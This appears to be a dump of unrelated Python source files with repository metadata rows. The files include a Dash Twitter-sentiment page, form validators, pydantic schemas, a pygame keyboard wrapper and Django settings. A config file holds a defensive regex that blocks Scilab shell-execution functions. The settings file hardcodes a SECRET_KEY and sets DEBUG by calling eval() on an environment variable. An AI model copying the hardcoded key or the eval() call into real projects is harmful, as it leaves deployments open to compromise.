        name, path, args, kwargs = super(IDField, self).deconstruct()
        kwargs['alphabet'] = self.alphabet
        kwargs['readable'] = self.readable
        return name, path, args, kwargs
bba1f2183a294e77712c38a933020d983a71dada | 2,432 | py | Python | apps/live_twitter_sentiment.py | VaishnaviVV/Covid19_sentiment_analysis | 6b6d0f76566bee1522eb69e407dc59d450e033b7 | [
"MIT"
] | 2 | 2021-04-13T06:12:59.000Z | 2021-07-21T14:04:45.000Z | apps/live_twitter_sentiment.py | VaishnaviVV/Covid19_sentiment_analysis | 6b6d0f76566bee1522eb69e407dc59d450e033b7 | [
"MIT"
] | null | null | null | apps/live_twitter_sentiment.py | VaishnaviVV/Covid19_sentiment_analysis | 6b6d0f76566bee1522eb69e407dc59d450e033b7 | [
"MIT"
] | 1 | 2021-06-19T09:06:38.000Z | 2021-06-19T09:06:38.000Z | #Essential Modules
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Dashboard Modules
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
from dash.dependencies import Input, Output
import dash_table
import plotly.express as px
import datetime as dt
from io import BytesIO
from wordcloud import WordCloud
from collections import deque
import pybase64
import os
import json
import sqlite3
from unidecode import unidecode
import time
from application import app
##from apps import live_twitter_sentiment_streaming
#Twitter Modules
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import random
import plotly
from navbar import Navbar
# Shared navigation bar component.
navs = Navbar()

# Module-level DB handle opened at import time.
# NOTE(review): unused by the callback below (it opens its own
# connection per tick) -- presumably kept for interactive use.
conn = sqlite3.connect('twitter.db')
c = conn.cursor()

# app=dash.Dash(__name__,external_stylesheets=[dbc.themes.BOOTSTRAP])

# Page layout: a card with the live graph and a 1-second refresh timer.
layout = dbc.Card(
    [
        dbc.CardBody(
            [
                html.H4("Live Twitter Sentiment", className="card-title"),
                dcc.Graph(id="live-graph"),
                dcc.Interval(
                    id="graph-update",
                    interval=1 * 1000  # fire every 1000 ms
                )
            ]
        ),
    ],
)

# Seed deques for plotting.
# NOTE(review): shadowed by the locals of the same name inside
# update_graph_scatter, so these module-level values are never read there.
X = deque(maxlen=20)
X.append(1)
Y = deque(maxlen=20)
Y.append(1)
@app.callback(Output('live-graph', 'figure'),
              [Input('graph-update', 'n_intervals')])
def update_graph_scatter(input_data):
    """Periodic Dash callback: rebuild the live sentiment scatter figure.

    :param input_data: ``n_intervals`` tick counter from the Interval
        component (unused, but required by the callback signature).
    :returns: plotly figure dict with the smoothed compound-sentiment trace.
    """
    # Open a short-lived connection per tick and always close it; the
    # original opened a new sqlite connection (and an unused cursor) on
    # every interval without ever closing them.
    conn = sqlite3.connect('twitter.db')
    try:
        df = pd.read_sql("SELECT * FROM sentiment ORDER BY unix DESC LIMIT 1000", conn)
    finally:
        conn.close()
    # Smooth the raw scores with a rolling mean over 1/5 of the sample,
    # then drop the NaN head produced by the rolling window.
    df['sentiment_smoothed'] = df['sentiment'].rolling(int(len(df)/5)).mean()
    df.dropna(inplace=True)
    x_values = df.unix.values[:]
    y_values = df.sentiment_smoothed.values[:]
    data = plotly.graph_objs.Scatter(
        x=list(x_values),
        y=list(y_values),
        name='Scatter',
        mode='lines+markers'
    )
    return {'data': [data],
            'layout': go.Layout(dict(xaxis={'range': [min(x_values), max(x_values)], 'title': 'Timestamp(ms)'},
                                     yaxis={'range': [min(y_values), max(y_values)], 'title': 'Compound Sentiment'}
                                     )
                                )
            }
# if __name__=="__main__":
# application.run_server(debug=True)
| 25.87234 | 109 | 0.623766 | 298 | 2,432 | 4.97651 | 0.432886 | 0.033715 | 0.026972 | 0.033715 | 0.051247 | 0.051247 | 0.051247 | 0.051247 | 0 | 0 | 0 | 0.012311 | 0.265214 | 2,432 | 93 | 110 | 26.150538 | 0.817571 | 0.109786 | 0 | 0.057143 | 0 | 0 | 0.127087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014286 | false | 0 | 0.4 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bba31ce3ee6b992e3cd5ca08943ddfe79b48cc83 | 1,208 | py | Python | cog/forms/forms_utils.py | downiec/COG | cea8ceac701958b6af8e272698bfb08d89f62bf4 | [
"BSD-3-Clause"
] | 6 | 2016-03-10T19:38:17.000Z | 2021-02-23T09:34:59.000Z | cog/forms/forms_utils.py | downiec/COG | cea8ceac701958b6af8e272698bfb08d89f62bf4 | [
"BSD-3-Clause"
] | 602 | 2015-01-05T16:30:08.000Z | 2021-02-02T21:44:38.000Z | cog/forms/forms_utils.py | cedadev/COG | 6167f9114c7cf0422b34fb9f5f3f07f9657a7dbe | [
"BSD-3-Clause"
] | 18 | 2015-02-12T15:50:17.000Z | 2021-04-27T16:40:36.000Z | '''
General utilities for form validation
@author: Luca Cinquini
'''
import os
import imghdr
def validate_image(form, field_name):
    '''
    Validates an image field that is part of a form,
    before the image is uploaded to the server.

    Checks the file extension against a white-list, then validates the
    actual image header with imghdr.  Errors are recorded in
    form._errors[field_name]; the function returns nothing.
    '''
    cleaned_data = form.cleaned_data
    image = cleaned_data.get(field_name, None)
    if image is None:
        return
    # enforce white-list of allowed extensions
    allowed_extensions = ('.jpg', '.png', '.gif', '.jpeg', '.tif', '.tiff')
    extension = (os.path.splitext(image.name)[1]).lower()
    if extension not in allowed_extensions:
        form._errors[field_name] = form.error_class(["Invalid image format: %s" % extension])
    # validate image header
    try:
        image_type = imghdr.what(image)
        # print() and str(e) below replace the Python-2-only print
        # statement and e.message, which crash under Python 3.
        print('Validating image header: detected image type=%s' % image_type)
        if image_type is None:
            form._errors[field_name] = form.error_class(["Invalid image type: %s" % image_type])
    except Exception as e:
        form._errors[field_name] = form.error_class(["Cannot validate image header: %s" % str(e)])
| 35.529412 | 105 | 0.621689 | 152 | 1,208 | 4.815789 | 0.460526 | 0.07377 | 0.061475 | 0.077869 | 0.213115 | 0.168033 | 0.168033 | 0.122951 | 0.122951 | 0 | 0 | 0.001131 | 0.268212 | 1,208 | 33 | 106 | 36.606061 | 0.826923 | 0.051325 | 0 | 0 | 0 | 0 | 0.156965 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.117647 | null | null | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbaed78c0a3771fe8d6877498d4f427ba1525026 | 665 | py | Python | app/schemas/entities/user.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | null | null | null | app/schemas/entities/user.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | null | null | null | app/schemas/entities/user.py | maxzhenzhera/my_vocab_backend | 2e9f968374e0bc2fcc0ae40830ca40f3cf5754d1 | [
"MIT"
] | null | null | null | from datetime import datetime
from pydantic import (
BaseModel,
EmailStr
)
from ..base import (
IDModelMixin,
ModelWithOrmMode
)
# Public names re-exported by this module.
__all__ = [
    'UserInCreate',
    'UserInLogin',
    'UserInUpdate',
    'UserInResponse'
]


class UserInCreate(BaseModel):
    """Payload for registering a new user."""
    email: EmailStr
    password: str


class UserInLogin(UserInCreate):
    """Payload for logging in; same fields as registration."""
    pass


class UserInUpdate(BaseModel):
    """Partial-update payload; None/omitted fields are left unchanged."""
    email: EmailStr | None
    password: str | None


class UserInResponse(IDModelMixin, ModelWithOrmMode):
    """User representation returned to API clients (ORM mode enabled)."""
    email: EmailStr
    email_confirmation_token: str
    is_active: bool
    is_email_confirmed: bool
    is_superuser: bool
    # None until the user confirms their email address.
    email_confirmed_at: datetime | None
bbb4219508a1092291e0cb9dc2078d91e4fdd976 | 479 | py | Python | product/urls.py | yusif763/Unistore-pro | 41ad0fa209c79a201d3f6a7aa68ec0ace707dcad | [
"MIT"
] | 3 | 2021-04-29T10:49:06.000Z | 2022-03-03T12:40:21.000Z | product/urls.py | yusif763/Unistore-pro | 41ad0fa209c79a201d3f6a7aa68ec0ace707dcad | [
"MIT"
] | null | null | null | product/urls.py | yusif763/Unistore-pro | 41ad0fa209c79a201d3f6a7aa68ec0ace707dcad | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path,include
from product.views import ProductDetailView , ProductListView
from django.conf import settings
from django.conf.urls.static import static
# Namespace for reversing URLs, e.g. reverse('product:product_list').
app_name = "product"

urlpatterns = [
    path('product-list/', ProductListView.as_view(), name='product_list'),
    path('product/<int:pk>/', ProductDetailView.as_view(), name='product_detail'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 29.9375 | 83 | 0.768267 | 61 | 479 | 5.901639 | 0.459016 | 0.111111 | 0.077778 | 0.094444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11691 | 479 | 15 | 84 | 31.933333 | 0.851064 | 0 | 0 | 0 | 0 | 0 | 0.132353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bbb58810fe63e339d5cd6293988a21ee96b008f3 | 1,792 | py | Python | idfy_rest_client/models/jwt_validation_request.py | dealflowteam/Idfy | fa3918a6c54ea0eedb9146578645b7eb1755b642 | [
"MIT"
] | null | null | null | idfy_rest_client/models/jwt_validation_request.py | dealflowteam/Idfy | fa3918a6c54ea0eedb9146578645b7eb1755b642 | [
"MIT"
] | null | null | null | idfy_rest_client/models/jwt_validation_request.py | dealflowteam/Idfy | fa3918a6c54ea0eedb9146578645b7eb1755b642 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
idfy_rest_client.models.jwt_validation_request
This file was automatically generated for Idfy by APIMATIC v2.0 ( https://apimatic.io )
"""
class JwtValidationRequest(object):

    """Implementation of the 'JwtValidationRequest' model.

    Jwt validation request

    Attributes:
        jwt (string): The JWT to be validated as an string

    """

    # Create a mapping from Model property names to API property names
    _names = {
        "jwt":'jwt'
    }

    def __init__(self,
                 jwt=None,
                 additional_properties=None):
        """Constructor for the JwtValidationRequest class

        Args:
            jwt (string, optional): the JWT to be validated.
            additional_properties (dict, optional): unrecognized API
                properties.  Defaults to a fresh dict per instance.
        """

        # Initialize members of the class
        self.jwt = jwt

        # Add additional model properties to the instance.  A None
        # sentinel replaces the previous ``={}`` default, which was a
        # single dict shared (and mutated) across all instances.
        self.additional_properties = {} if additional_properties is None else additional_properties

    @classmethod
    def from_dictionary(cls,
                        dictionary):
        """Creates an instance of this model from a dictionary

        Args:
            dictionary (dictionary): A dictionary representation of the object as
            obtained from the deserialization of the server's response. The keys
            MUST match property names in the API description.

        Returns:
            object: An instance of this structure class.

        """
        if dictionary is None:
            return None

        # Extract variables from the dictionary
        jwt = dictionary.get('jwt')

        # Clean out expected properties from dictionary.
        # NOTE: this mutates the caller's dict (generated-code convention);
        # the leftovers become additional_properties.
        for key in cls._names.values():
            if key in dictionary:
                del dictionary[key]

        # Return an object of this model
        return cls(jwt,
                   dictionary)
| 26.352941 | 92 | 0.586496 | 188 | 1,792 | 5.515957 | 0.446809 | 0.019286 | 0.038573 | 0.030858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00258 | 0.351004 | 1,792 | 67 | 93 | 26.746269 | 0.88908 | 0.517857 | 0 | 0 | 1 | 0 | 0.013196 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbb956f3dcc1f38ad80f492ee67e82aaf87516fe | 1,443 | py | Python | designer/keyboard.py | designer-edu/designer | 9c5d004e934300a30fb6d3148f4db313b69057df | [
"MIT"
] | 3 | 2022-01-21T00:08:02.000Z | 2022-03-09T19:00:26.000Z | designer/keyboard.py | krishols/designer | 8f80b3309802d16d8577280274e0c9fa02db306b | [
"MIT"
] | 24 | 2021-08-13T17:09:15.000Z | 2022-01-05T16:12:09.000Z | designer/keyboard.py | designer-edu/designer | 9c5d004e934300a30fb6d3148f4db313b69057df | [
"MIT"
] | null | null | null | """The keyboard modules provides an interface to adjust the keyboard's repeat
rate.
.. attribute:: repeat
When the keyboard repeat is enabled, keys that are held down will keep
generating new events over time. Defaults to `False`.
.. attribute:: delay
`int` to control how many milliseconds before the repeats start.
.. attribute:: interval
`int` to control how many milliseconds to wait between repeated events.
"""
import pygame
class KeyboardModule:
    """Stateful wrapper around pygame's keyboard key-repeat settings.

    Tracks the desired repeat flag, delay and interval locally and pushes
    them to pygame via ``pygame.key.set_repeat`` whenever one changes.
    """

    # Default key-repeat configuration.
    DEFAULT_DELAY = 600
    DEFAULT_REPEAT = False
    DEFAULT_INTERVAL = 100

    def __init__(self):
        # Use the class-level defaults instead of re-hardcoding the magic
        # numbers (600/100/False were previously duplicated here).
        self._repeat = self.DEFAULT_REPEAT
        self._delay = self.DEFAULT_DELAY
        self._interval = self.DEFAULT_INTERVAL

    def _update_repeat_status(self):
        """Push the current settings to pygame."""
        if self._repeat:
            pygame.key.set_repeat(self._delay, self._interval)
        else:
            # Calling set_repeat() with no arguments disables key repeat.
            pygame.key.set_repeat()

    @property
    def repeat(self):
        """bool: whether held keys keep generating new events."""
        return self._repeat

    @repeat.setter
    def repeat(self, value):
        self._repeat = value
        self._update_repeat_status()

    @property
    def interval(self):
        """int: milliseconds between repeated events."""
        return self._interval

    @interval.setter
    def interval(self, value):
        self._interval = value
        self._update_repeat_status()

    @property
    def delay(self):
        """int: milliseconds a key must be held before repeats start."""
        return self._delay

    @delay.setter
    def delay(self, value):
        self._delay = value
        # A zero delay cannot repeat; treat it as turning repeat off.
        if value == 0:
            self._repeat = False
        self._update_repeat_status()
bbc4643c50605cf9ee6bd53e30b5c017250f35fb | 378 | py | Python | src/Dominion/Actioncards/Vassal.py | CarlGathmann/Dominion | dc30a6db5f005d1148c5ddb4346a8d2b4397001c | [
"MIT"
] | null | null | null | src/Dominion/Actioncards/Vassal.py | CarlGathmann/Dominion | dc30a6db5f005d1148c5ddb4346a8d2b4397001c | [
"MIT"
] | null | null | null | src/Dominion/Actioncards/Vassal.py | CarlGathmann/Dominion | dc30a6db5f005d1148c5ddb4346a8d2b4397001c | [
"MIT"
] | null | null | null | from src.Dominion.Cardtypes.Actioncard import Actioncard
class Vassal(Actioncard):
    """Vassal action card: costs 3, gives +2 money, and may play the
    drawn top card of the deck if it is an action card."""

    EXPENCES = 3
    CARDS = 0
    ACTIONS = 0
    BUYS = 0
    MONEY = 2

    def specialAction(self, player, game):
        """Draw the top card; if it is an action card, play it at once."""
        drawn = player.drawAndReturn()
        if not isinstance(drawn, Actioncard):
            return
        print("playing", drawn, "with Vassal")
        player.playActioncard(drawn, game)
bbc5bb679186b23bb3fc2ab00d1dedb29209a03c | 4,107 | py | Python | config.py | gzq763199198/xcos_on_cloud | 63ce264e79f03151e0f414abc3953b9d7d84a388 | [
"MIT"
] | 1 | 2019-02-15T03:10:46.000Z | 2019-02-15T03:10:46.000Z | config.py | gzq763199198/xcos_on_cloud | 63ce264e79f03151e0f414abc3953b9d7d84a388 | [
"MIT"
] | null | null | null | config.py | gzq763199198/xcos_on_cloud | 63ce264e79f03151e0f414abc3953b9d7d84a388 | [
"MIT"
] | null | null | null | # The location of the extracted scilab_for_xcos_on_cloud. This can be either
# relative to SendLog.py or an absolute path.
SCILAB_DIR = '../scilab_for_xcos_on_cloud'
# The location to keep the flask session data on server.
FLASKSESSIONDIR = '/tmp/flask-sessiondir'
# The location to keep the session data on server.
SESSIONDIR = '/tmp/sessiondir'
# The location of the xcos files on server.
XCOSSOURCEDIR = ''
# the http server settings
HTTP_SERVER_HOST = '127.0.0.1'
HTTP_SERVER_PORT = 8001
# the database server settings
DB_HOST = '127.0.0.1'
DB_USER = 'scilab'
DB_PASS = ''
DB_NAME = 'scilab'
DB_PORT = 3306
# the database queries

# All categories having at least one approved (approval_status = 1),
# completed (proposal_status = 3) book with an Xcos ('X') example file.
QUERY_CATEGORY = (
    "SELECT DISTINCT(loc.id), loc.category_name "
    "FROM textbook_companion_preference pe "
    "JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
    "JOIN list_of_category loc ON pe.category = loc.id "
    "JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
    "JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
    "JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
    "JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
    "WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
    "pe.approval_status = 1 "
    "ORDER BY loc.id ASC")

# Books within one category (parameter: category id).
QUERY_BOOK = (
    "SELECT DISTINCT(pe.id), pe.book, pe.author "
    "FROM textbook_companion_preference pe "
    "JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
    "JOIN list_of_category loc ON pe.category = loc.id "
    "JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
    "JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
    "JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
    "JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
    "WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
    "pe.approval_status = 1 AND pe.category = %s "
    "ORDER BY pe.book ASC")

# Chapters of one book (parameter: preference/book id).
QUERY_CHAPTER = (
    "SELECT DISTINCT(tcc.id), tcc.number, tcc.name "
    "FROM textbook_companion_preference pe "
    "JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
    "JOIN list_of_category loc ON pe.category = loc.id "
    "JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
    "JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
    "JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
    "JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
    "WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
    "pe.approval_status = 1 AND tcc.preference_id = %s "
    "ORDER BY tcc.number ASC")

# Examples of one chapter (parameter: chapter id).
QUERY_EXAMPLE = (
    "SELECT DISTINCT(tce.id), tce.number, tce.caption "
    "FROM textbook_companion_preference pe "
    "JOIN textbook_companion_proposal po ON pe.proposal_id = po.id "
    "JOIN list_of_category loc ON pe.category = loc.id "
    "JOIN textbook_companion_chapter tcc ON pe.id = tcc.preference_id "
    "JOIN xcos_on_cloud_enable_book xceb ON pe.id = xceb.book_id "
    "JOIN textbook_companion_example tce ON tcc.id = tce.chapter_id "
    "JOIN textbook_companion_example_files tcef ON tce.id = tcef.example_id "
    "WHERE tcef.filetype = 'X' AND po.proposal_status = 3 AND "
    "pe.approval_status = 1 AND tce.chapter_id = %s "
    "ORDER BY tce.number")

# Xcos ('X') files belonging to one example (parameter: example id).
QUERY_EXAMPLE_FILE = (
    "SELECT id as example_file_id, filename "
    "FROM textbook_companion_example_files "
    "WHERE filetype = 'X' AND example_id = %s"
)

# Look up a single Xcos file by its file id.
QUERY_EXAMPLE_FILE_BY_ID = (
    "SELECT filename, filepath, example_id "
    "FROM textbook_companion_example_files "
    "WHERE filetype = 'X' AND id = %s"
)

# Prerequisite script ('S') files for one example (parameter: example id).
QUERY_PREREQUISITE_FILE_BY_EXAMPLE_ID = (
    "SELECT filename, filepath, id as prerequisite_file_id "
    "FROM textbook_companion_example_files "
    "WHERE filetype = 'S' AND example_id = %s"
)
# Following are system command which are not permitted in sci files
# (Reference scilab-on-cloud project).
# Regex of forbidden Scilab/system functions; the two raw-string parts
# are concatenated into one alternation pattern.
SYSTEM_COMMANDS = (
    r'unix\(.*\)|unix_g\(.*\)|unix_w\(.*\)|unix_x\(.*\)|unix_s\(.*\)|host'
    r'|newfun|execstr|ascii|mputl|dir\(\)'
)
# Whether to delete generated/session files after use.
REMOVEFILE = True
| 38.383178 | 77 | 0.720477 | 629 | 4,107 | 4.461049 | 0.176471 | 0.139344 | 0.119743 | 0.098361 | 0.639701 | 0.604063 | 0.604063 | 0.604063 | 0.586244 | 0.550606 | 0 | 0.008323 | 0.180911 | 4,107 | 106 | 78 | 38.745283 | 0.825803 | 0.107378 | 0 | 0.443038 | 0 | 0 | 0.777565 | 0.24788 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.012658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbc8e062ddb6e77238b67ff0bb071c38b56c6ab0 | 1,450 | py | Python | electronics/gateways/linuxdevice.py | MartijnBraam/pyElectronics | a20878c9fa190135f1e478e9ea0b54ca43ff308e | [
"MIT"
] | 77 | 2016-02-22T21:14:02.000Z | 2022-03-18T14:28:35.000Z | electronics/gateways/linuxdevice.py | MartijnBraam/pyElectronics | a20878c9fa190135f1e478e9ea0b54ca43ff308e | [
"MIT"
] | 8 | 2016-02-23T22:21:42.000Z | 2019-03-02T23:46:46.000Z | electronics/gateways/linuxdevice.py | MartijnBraam/pyElectronics | a20878c9fa190135f1e478e9ea0b54ca43ff308e | [
"MIT"
] | 9 | 2016-02-23T22:06:34.000Z | 2022-03-18T14:28:41.000Z | import smbus
import struct
class LinuxDevice(object):
    """
    I2C master driven through a Linux kernel module via smbus.

    Examples are the SMBus on a PC motherboard (i2c-dev) or the i2c bus
    of a Raspberry Pi (i2c-bcm2708).  Linux numbers every i2c bus; the
    Raspberry Pi 2 exposes its bus as number 1 (/dev/i2c-1).

    :param i2c_bus_index: The number of the i2c bus.
    """

    def __init__(self, i2c_bus_index):
        self.i2c_index = i2c_bus_index
        self.bus = smbus.SMBus(i2c_bus_index)

    def i2c_write_register(self, address, register, data):
        """Write one byte or a sequence of bytes to a device register."""
        # Normalize a single int to a one-element sequence up front.
        payload = [data] if isinstance(data, int) else data
        for byte in payload:
            self.bus.write_byte_data(address, register, byte)

    def i2c_read_register(self, address, register, length):
        """Read ``length`` consecutive registers and return them as bytes."""
        chunks = []
        for reg in range(register, register + length):
            raw = self.bus.read_byte_data(address, reg)
            # smbus uses struct.unpack('@b'), but almost nothing is a
            # signed byte with native ordering -- re-pack to raw bytes.
            chunks.append(struct.pack('@b', raw))
        return b"".join(chunks)

    def i2c_read(self, address, length):
        raise NotImplementedError()

    def i2c_write(self, address, data):
        raise NotImplementedError()
bbcbfbd1d58ce2b647da49b8c46ee6e1affed712 | 292 | py | Python | tests/func/conftest.py | madtibo/temboard-agent | c63b82e243c9155e1878ba94e747b51761d62138 | [
"PostgreSQL"
] | null | null | null | tests/func/conftest.py | madtibo/temboard-agent | c63b82e243c9155e1878ba94e747b51761d62138 | [
"PostgreSQL"
] | null | null | null | tests/func/conftest.py | madtibo/temboard-agent | c63b82e243c9155e1878ba94e747b51761d62138 | [
"PostgreSQL"
] | null | null | null | import pytest
from test.temboard import build_env_dict, drop_env, init_env
ENV = {}
@pytest.fixture(autouse=True, scope='session')
def env():
    """Session-wide test environment: built once, always torn down."""
    env_dict = build_env_dict()
    # Start from a clean slate, then provision the environment.
    drop_env(env_dict)
    init_env(env_dict)
    ENV.update(env_dict)
    try:
        yield ENV
    finally:
        # Tear down even when a test errors out.
        drop_env(env_dict)
| 15.368421 | 60 | 0.64726 | 42 | 292 | 4.285714 | 0.47619 | 0.2 | 0.133333 | 0.177778 | 0.211111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243151 | 292 | 18 | 61 | 16.222222 | 0.81448 | 0 | 0 | 0.153846 | 0 | 0 | 0.023973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbdf54f606318a7ccaabefa4c50ba61c3c9c2f2d | 866 | py | Python | LAB02/CloudAlbum/run.py | michaelrishiforrester/moving-to-serverless-workshop-1d | 5af925b00b5b7dfe7861b090343ced54676cffc3 | [
"MIT"
] | 7 | 2019-03-12T00:58:36.000Z | 2019-08-21T04:13:27.000Z | LAB02/CloudAlbum/run.py | aws-kr-tnc/moving-to-serverless-workshop-1d | 5af925b00b5b7dfe7861b090343ced54676cffc3 | [
"MIT"
] | 30 | 2019-12-26T17:30:42.000Z | 2022-03-21T22:17:48.000Z | LAB02/CloudAlbum/run.py | michaelrishiforrester/moving-to-serverless-workshop-1d | 5af925b00b5b7dfe7861b090343ced54676cffc3 | [
"MIT"
] | 7 | 2019-05-27T01:53:29.000Z | 2020-02-26T18:42:29.000Z | from flask import Flask, session
from flask_session import Session
from cloudalbum import application as CloudAlbum
from cloudalbum.config import conf
from cloudalbum import util
from redis import StrictRedis
import os, socket
app = Flask(__name__)
# Flask Session for Redis
#app.config['SESSION_TYPE'] = 'redis'
#app.config['SESSION_REDIS'] = StrictRedis(host='<ELASTICACHE_ENDPOINT>', port=<PORT>)
#Session(app)
# This code is inserted for only LAB02.
@app.template_filter()
def get_ip_addr(value):
    # Jinja2 template filter; `value` is ignored -- always returns the
    # serving host's name wrapped in parentheses, e.g. "(myhost)".
    hostname = '({0})'.format(socket.gethostname())
    return hostname
if __name__ == '__main__':
util.check_variables()
app = CloudAlbum.init_app(app)
app.logger.debug('DB_URL: {0}'.format(conf['DB_URL']))
app.logger.debug('GMAPS_KEY: {0}'.format(conf['GMAPS_KEY']))
app.run(host=conf['APP_HOST'], port=conf['APP_PORT'], debug=True)
| 25.470588 | 86 | 0.729792 | 121 | 866 | 5 | 0.438017 | 0.059504 | 0.066116 | 0.069421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006658 | 0.132794 | 866 | 33 | 87 | 26.242424 | 0.798935 | 0.224018 | 0 | 0 | 0 | 0 | 0.103916 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.388889 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bbdf5cf8f8fae95f6eaee3ec6200af3cab9a6613 | 6,061 | py | Python | aprepi/settings.py | MikaelSantilio/aprepi-django | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | [
"MIT"
] | null | null | null | aprepi/settings.py | MikaelSantilio/aprepi-django | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | [
"MIT"
] | 9 | 2021-01-13T22:06:29.000Z | 2021-06-16T10:33:48.000Z | aprepi/settings.py | MikaelSantilio/aprepi-django | 5e2b5ecffb287eab929c0759ea35ab073cc19d96 | [
"MIT"
] | 1 | 2021-02-05T18:12:15.000Z | 2021-02-05T18:12:15.000Z | from pathlib import Path
from datetime import timedelta
import os
import environ
env = environ.Env()
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+t#_3i@_h(7lj=_4(s9^igwu*y&&87izjoo$xw7ji_a66!#ri1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = eval(os.getenv('DEBUG', default='True'))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# Third-party APPs
'django_extensions',
'widget_tweaks',
"rest_framework",
'corsheaders',
# "rest_framework.authtoken",
"django_filters",
"drf_yasg",
# Project APPs
'users',
'donations',
'core',
'events',
'member',
]
MIDDLEWARE = [
"whitenoise.middleware.WhiteNoiseMiddleware",
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
